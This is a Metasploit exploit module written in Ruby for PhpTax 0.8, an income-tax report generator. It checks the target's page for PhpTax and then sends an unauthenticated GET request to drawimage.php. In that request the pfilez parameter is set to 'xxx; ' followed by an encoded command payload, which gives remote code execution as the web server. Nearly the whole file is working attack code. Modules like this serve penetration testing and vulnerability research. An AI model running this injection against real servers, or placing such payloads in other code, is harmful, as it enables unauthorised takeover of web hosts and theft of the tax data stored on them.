## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "PhpTax pfilez Parameter Exec Remote Code Injection", 'Description' => %q{ This module exploits a vulnerability found in PhpTax, an income tax report generator. When generating a PDF, the icondrawpng() function in drawimage.php does not properly handle the pfilez parameter, which will be used in a exec() statement, and then results in arbitrary remote code execution under the context of the web server. Please note: authentication is not required to exploit this vulnerability. }, 'License' => MSF_LICENSE, 'Author' => [ 'Jean Pascal Pereira ', 'sinn3r' #Metasploit ], 'References' => [ ['OSVDB', '86992'], ['EDB', '21665'] ], 'Payload' => { 'Compat' => { 'ConnectionType' => 'find', 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl ruby bash telnet python' } }, 'Platform' => %w{ linux unix }, 'Targets' => [ ['PhpTax 0.8', {}] ], 'Arch' => ARCH_CMD, 'Privileged' => false, 'DisclosureDate' => "Oct 8 2012", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The path to the web application', '/phptax/']) ], self.class) end def check uri = normalize_uri(target_uri.path) uri << '/' if uri[-1,1] != '/' res = send_request_raw({'uri'=>uri}) if res and res.body =~ /PHPTAX by William L\. Berggren/ return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end def exploit uri = target_uri.path print_status("#{rhost}#{rport} - Sending request...") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "drawimage.php"), 'vars_get' => { 'pdf' => 'make', 'pfilez' => "xxx; #{payload.encoded}" } }) handler end end